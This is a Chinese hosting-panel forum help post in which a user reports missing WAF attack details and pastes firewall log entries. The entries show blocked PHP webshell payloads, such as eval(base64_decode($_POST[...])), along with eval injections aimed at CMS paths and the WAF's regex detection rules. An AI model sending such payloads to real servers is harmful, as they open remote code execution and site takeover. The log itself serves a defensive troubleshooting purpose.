宝塔官网 IDC推荐 宝塔币商城 邀请大使
【菠萝云】免费装宝塔,4G内存68 ★美国CN2高防服务器★打死退款★ ★香港CN2云/站群/高防/特价机★ 【滴盾】高防服务器 专抗DDOS 【多途云】高防CDN
高防服务器,无视一切流量攻击 SSL证书,防止数据被劫持 OV/EV SSL证书,可当日签发 宝塔一键部署DV,EV,OV,SSL证书 A10招租,联系qq394030111
★易探云.香港/美国/国内/游戏云★ 【苍穹云】高性能云服务器 1.2折起 【迅线云盒】内网穿透-固定公网IP 高防服务器40核 64G 20M 199/月 【恒爱云】香港低至8元1核1G2M
当前位置:论坛首页 > Linux面板 > 求助

【BUG反馈】 宝塔网站防火墙异常

bobobo发表在 Linux面板2018-8-20 22:42 [复制链接] 1 3551


vip一年专业版
第一安装防火墙很好用,前几天手动删除了服务/www/wwwlogs 的所有的文件后,后台统计有几次攻击类的信息,但详细信息看不到





日志里的btwaf目录下却有记录    不知道如何修复,请技术指导,如果老大能给解决了,帖子我会写出详细的解决步骤供其他小白们学习
使用道具 举报 只看该作者 回复
bobobo
发表于 2018-8-20 22:45:54 | 显示全部楼层
  1. ["2018-08-20 21:51:11","216.172.153.202","GET","\/index.php?m=vod-search&wd={if-A:assert($_POST[a])}{endif-A}","Opera\/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto\/2.9.168 Version\/11.52","args","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> wd:{if-A:assert($_POST[a])}{endif-A}"]
  2. ["2018-08-20 21:52:13","216.172.153.202","GET","\/email\/shell.php","Mozilla\/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident\/4.0; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)","url","\/(hack|shell|spy|phpspy)\\.php$ >> 1:\/email\/shell.php"]
  3. ["2018-08-20 22:21:45","61.160.215.50","POST","\/\/plus\/mytag_js.php?aid=9090","Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)","post","base64_decode\\( >> guige:@eval\u0001(base64_decode($_POST[z0]));"]
  4. ["2018-08-20 22:21:45","61.160.215.50","POST","\/\/user\/niubi.php","Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)","post","base64_decode\\( >> lequ:@session_start();$_SESSION[chr(90)]=$_POST[chr(124)];@eval(base64_decode($_SESSION[chr(90)]));die();"]
  5. ["2018-08-20 22:21:46","61.160.215.50","POST","\/\/utility\/convert\/data\/config.inc.php","Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)","post","base64_decode\\( >> tom:@session_start();$_SESSION[chr(90)]=$_POST[chr(124)];@eval(base64_decode($_SESSION[chr(90)]));die();"]
  6. ["2018-08-20 22:21:46","61.160.215.50","GET","\/\/uploads\/dede\/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\\%22;eval($_POST[lequ]);die();\/\/","Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)","args","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|char|chr|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> refiles[1]:\\";eval($_POST[lequ]);die();\/\/"]
  7. ["2018-08-20 22:21:46","61.160.215.50","POST","\/\/uploads\/dede\/sys_verifies.php?action=down","Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)","post","base64_decode\\( >> lequ:@session_start();$_SESSION[chr(90)]=$_POST[chr(124)];@eval(base64_decode($_SESSION[chr(90)]));die();"]
  8. ["2018-08-20 22:21:46","61.160.215.50","GET","\/\/web\/new\/fenlei\/search.php?mid=1&action=search&keyword=asd&postdb[city_id]=..\/..\/admin\/hack&hack=jfadmin&action=addjf&Apower[jfadmin_mod]=1&fid=1&title=${eval($_POST[lequ])}","Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)","args","\\$\\{ >> title:${eval($_POST[lequ])}"]
  9. ["2018-08-20 22:21:46","61.160.215.50","POST","\/\/web\/new\/fenlei\/do\/jf.php","Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)","post","base64_decode\\( >> lequ:@session_start();$_SESSION[chr(90)]=$_POST[chr(124)];@eval(base64_decode($_SESSION[chr(90)]));die();"]
  10. ["2018-08-20 22:21:46","61.160.215.50","POST","\/\/web\/new\/fenlei\/do\/jf.php","Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)","post","60秒以内累计超过6次以上非法请求,封锁180秒"]
  11. ["2018-08-20 22:35:55","223.104.10.111","GET","\/index.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
  12. ["2018-08-20 22:35:55","223.104.10.111","GET","\/favicon.ico","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
  13. ["2018-08-20 22:36:06","223.104.10.111","GET","\/index.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
  14. ["2018-08-20 22:36:06","223.104.10.111","GET","\/favicon.ico","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
  15. ["2018-08-20 22:36:48","223.104.10.111","GET","\/index.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
  16. ["2018-08-20 22:36:48","223.104.10.111","GET","\/favicon.ico","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
  17. ["2018-08-20 22:38:33","223.104.10.111","GET","\/index.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
  18. ["2018-08-20 22:38:33","223.104.10.111","GET","\/favicon.ico","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
  19. ["2018-08-20 22:38:34","223.104.10.111","GET","\/index.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
  20. ["2018-08-20 22:38:34","223.104.10.111","GET","\/favicon.ico","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
  21. ["2018-08-20 22:38:37","223.104.10.111","GET","\/index.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
  22. ["2018-08-20 22:38:37","223.104.10.111","GET","\/favicon.ico","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
  23. ["2018-08-20 22:38:46","223.104.10.111","GET","\/forum.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
  24. ["2018-08-20 22:38:46","223.104.10.111","GET","\/forum.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","60秒以内累计超过6次以上非法请求,封锁180秒"]
复制代码


使用道具 举报 回复 支持 反对
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

登录 注册

企业版年付运维跟进群

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急问题处理

论坛响应时间:10分钟

问题处理方式:1对1处理(优先)

工作时间:白班:9:00 - 18:00

工作时间:晚班:18:00 - 24:00

立即付费处理
  • 联系我们
  • 周一至周六,节假日除外
  • 9:15~12:30,14:00~18:15
  • 联系电话:0769-23030556
  • 如有问题,论坛发帖咨询
  • 商务合作QQ/WX:394030111

《开源许可协议》 | 《用户协议》 | 《隐私声明》 |

高新技术企业编号GR201944000059|粤B2-20201398|粤ICP备17030143号|粤公网安备44190002003211号

Copyright © 2021 宝塔面板|让运维简单高效(www.bt.cn) 广东堡塔安全技术有限公司     Powered by Discuz! X3.4Rights Reserved

违法网站请勿向我司工作人员发起任何形式的人工服务请求,严禁使用宝塔面板从事任何非法活动 | 违规信息举报入口 | 中国互联网举报中心

快速回复 返回顶部 返回列表